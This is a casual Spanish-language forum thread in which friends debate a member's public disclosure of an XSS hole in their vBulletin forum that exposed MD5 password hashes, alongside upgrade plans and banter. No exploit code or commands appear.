Cada pocos segundos. Si yo supiera hacer estas cosas haría que salieran ese tipo de textos por pantalla, no las cosas sosas que suelen salir en plan Password : verteporfin

Aceptamos barco.

Por cierto que La Paradoja del Cumpleaños es algo curiosísimo...bueno, según se mire. Al que le gusten las anécdotas matemáticas que rompen el sentido común que lo mire. Y resulta que luego tiene gran utilidad.

Te recomendaré un libro (o dos), cuando me los lea.

Por cierto que La Paradoja del Cumpleaños es algo curiosísimo...bueno, según se mire. Al que le gusten las anécdotas matemáticas que rompen el sentido común que lo mire. Y resulta que luego tiene gran utilidad.

El planteamiento está guapo porque de primeras resulta curioso de cojones que la probabilidad sea tan alta. Mirado con algo de lógica tiene su qué la razón, pero lo que mola es que de primeras dices "bah imposible".

Y si que se utiliza, sí.

}:-D

Ataque a Sinideas,

o cómo Gándalf demuestra que está aprendiendo algo en su carrera después de todo y los Administradores en vez de agachar la cabeza y arreglar el fallo de seguridad le mordéis el dedo índice.

Yo no he entendido ni papa, así que no os preocupeis más, que no os voy a hackear el foro, Ok? No os pongais así... xD

Ataque a Sinideas,

o cómo Gándalf demuestra que está aprendiendo algo en su carrera después de todo y los Administradores en vez de agachar la cabeza y arreglar el fallo de seguridad le mordéis el dedo índice.


Lástima. Un símil más cercano a la metáfora del dedo y la luna remezclado contemporaneamente con actualidad foril hubiera estado más chachipilonguis.

Yo es que aunque no lo parezca, no tengo tiempo para actualizar el foro. En el curro puedo forear y ya, poco mas. Y en casa estoy solo 2 o 3 tardes a la semana.

El foro uno se lo curra para que tengamos algo donde perder el tiempo y divertirnos, y entiendo que gandalf lo ha hecho con toda su buena intencion de avisarnos, pero tambien lo ha hecho para demostrar su "habilidad". Que no lo veo mal, pero es cierto que lo que ha hecho tanto nos ayuda como nos perjudica.

Yo, aunque pongas este hilo aquí, voy a seguir teniendo el mismo tiempo que antes para ponerme con ganas a arreglarlo. Cuando instalé vbulletin, instalé una version anterior porque primero, no me gusta instalar versiones recientes de nada, y 2º, esta era la mas actualizada con traducción al castellano.

Para hacer una actualizacion, no se como funcionará, nunca lo he hecho, pero se que se pierden cosas que hay que reinstalar y tal, y quieras que no, seamos vagos o no, siempre da pereza. No fui vago cuando por intentar mejorar SMF al día siguiente teniais un foro vbulletin funcionando, no soy vago ahora.

Me gusta tener el foro en condiciones, me encantaria que fuera seguriiiiiiisimo, pero estas cosas requieren tiempo y meterse 100% en ello, y yo ahora mismo no puedo.

Te agradezco la intención del hilo, pero es lo que te he dicho antes, tengo el mismo tiempo si lo haces publico como si lo haces privado. Y privado hubiera sido mas elegante, vamos, hubiera sido pensando en nosotros y no en tí mismo y tu gloria como hacker amateur. Que por otra parte te felicito por intentar hackearme el foro, me hubiera encantado tener que perder el tiempo en dejarlo todo bien de nuevo.

A ver, gañán, si consigo hackear el foro no me habría cargado nada, hasta yo mismo habría dejado las cosas tal y como estaban si no lo hacías tú antes.

Como mañana acabo los exámenes, el tiempo que no esté borracho o resacoso en el cine este fin de semana miraré a ver si encuentro un tutorial de actualización de vbulletin y te puedo ayudar para que no tengas tú que perder el tiempo en leerte mil historias pero yo en temas de hosting ni idea. Cuando Fonk un día me dejó la clave de su dominio para un proyecto blogil, me volví loco porque ni zorra de eso y me daba miedo tocar cualquier cosa y cargármelo, me bajé un manual enooorme pero al final...la vagancia pudo. Así que la relación actualización del foro - cómo se hagan las cosas en tu hosting, ahí ya sí que no te voy a poder ayudar.

Imagino que tendré que bajarme el vbulletin mas actual e instalarlo subiendolo al hosting, pero miedo me da que se pierda to!

IGualmente hare copias de seguridad y tal.

La verdad es que es interesante el tema, pero lo suyo habría sido un privado a administración, y después de solucionarlo, postearlo como algo didáctico ;)

Es como si yo fuera un negro, y al otro lado de la calle hubieran un grupo de skin heads que no me han visto. En vez de acercarte y decirme: "oye tio, cuidao que esos te apalean si te ven." Tu me has gritado desde lejos: " NEGROOOOOOOOOO, QUE TE VAN A PEGAAAAAAAAAR, JAJAJAJA, DAME LAS GRACIAS QUE TE HE AVISAO MAJETEE!!"

Genial ejemplo, descriptivo a más no poder. Me meo de risa, jaja.

Jajaajajaajaja.

Jajaja. Grani, a veces te sales, jaja.

Pero solo a veces :(

Por lo que estoy leeyendo por ahí, sí grani, tienes que subir todos los ficheros pero a la hora de instalar te da la opción de instalar o actualizar, creo.

Amigos, es posible que pronto dejemos de tener foro xD

Cuando encuentre un exploit más nuevo monto una web XD.

Daion, querido.

Hoy te voy a dar 25 piedras verdes.

En serio, de normal entro al foro este mas que nada para buscar tus mensajes, catarlos lentamente y dejar que me embarguen cual dulce ambriosia. Pero es que las carcajadas que me has hecho soltar hoy con este hilo y con alguna otra perla suelta que has dejado por ahi no han sido normales.

Ailoviu.

A ver tarado

No me sorprende que el foro tenga una vulnerabilidad. Me extraña sobremanera que el agujero sea un puto cross site scripting de toda la puta vida. Normalmente, en aplicaciones web moderadamente actuales, cada vez que algo se procesa , se filtran ciertas cadenas de caracteres que permiten a un usuario colarnos codigo malicioso e hijodeputa.

Ok, el exploit funciona y permite ver el password encriptado que la BD almacena. ¿Y?. En nuestro caso, el hecho de que te muestre la cerradura no implica que automaticamente tengas la llave.

Si no he entendido mal, has sacado una foto de la cerradura y nos la has enseñado. De ahi a abrir la puerta hay un trecho. Netpalurdo.

Otra cosa. Si piensas forzar la cerradura con fuerza bruta ¿Para que cojones necesitas el hash?

Esto no quita que debamos arreglar el forete, que lo haremos.

Y ojo, que aplaudo el hecho de que lo hayas mostrado aqui. Jejeje estas hecho un pequeño cabron. Solo escribo esto para remarcar tu pacomartinezsorianismo innato.

Otra cosa. Si piensas forzar la cerradura con fuerza bruta ¿Para que cojones necesitas el hash?

Eso se lo entendí mal yo también.

El pilló el hash y luego lo que trataba de hacer era desencriptarlo.
Vamos que lo de Brute Force no era para usarlo en la peich, sino una forma de decir que una vez con el hash en una mano estaba probando todas las posibilidades de 1 a 7 dígitos para ver si alguna (encriptandolo y por comparación supongo) le coincidía con el mismo y le tocaba el premio.

}:-D

Pero la gracia del md5 segun tengo entendido es que al invertir el algoritmo no obtienes una clave unica. O sea, si no sabes cuantos caracteres tiene el password. Si a partir de pocos caracteres ya empieza a ser inviable desencriptar en un tiempo razonable. Si lo desencriptas y obtienes un numero elevado de opciones. ¿Esto es una vulnerabilidad critica urgente que necesita de una solucion urgente?

MD5 no es invertible y es resistente a colisiones (en teoría) aunque se han encontrado cosillas para tocar la moral en ese sentido.

Es mucho más rápido tener un valor que comparar en tu máquina y tirar de procesador puro y duro que probar haciendo peticiones por internet. Tardarías un millón de veces más tal y como va internet en este país.

La urgencia depende de los medios que tenga el atacante, con los míos no es crítica porque tardaría mucho, con un ataque mínimamente distribuido con, por ejemplo, veinte maquinitas, que no es nada si aprendes a distribuir y usar un cutregusano de los que miles que hay por ahí para ser usados sin tener ni puñetera idea (como este exploit), la cosa cambia bastante.

El simple hecho de que se pueda obtener la hash de alguno de los usuarios supone que saber su clave es cuestión de tiempo y ganas.

MD5 no es invertible y es resistente a colisiones (en teoría) aunque se han encontrado cosillas para tocar la moral en ese sentido.

Es mucho más rápido tener un valor que comparar en tu máquina y tirar de procesador puro y duro que probar haciendo peticiones por internet. Tardarías un millón de veces más tal y como va internet en este país.

La urgencia depende de los medios que tenga el atacante, con los míos no es crítica porque tardaría mucho, con un ataque mínimamente distribuido con, por ejemplo, veinte maquinitas, que no es nada si aprendes a distribuir y usar un cutregusano de los que miles que hay por ahí para ser usados sin tener ni puñetera idea (como este exploit), la cosa cambia bastante.

El simple hecho de que se pueda obtener la hash de alguno de los usuarios supone que saber su clave es cuestión de tiempo y ganas.

Ah claro, un tio con 20 maquinas (un mega hacker) estará interesadísimo en jodernos sinideas, un foro con un contenido sumamente importante en su base de datos donde el FBI, el CSI y Hospital central se pasan información confidencial sobre como tiene los testiculos Elton John.

Los megahackers no controlan 20 máquinas, controlan muchas más. Infectar 20 máquinas con un virus lanzándolo por ahí es algo minúsculo, macho, pero vamos, minusculísimo.

Eh, que me da igual

:sly:
:sparte:
:brus:
:redc:




:cuddy:

xDDDDDDD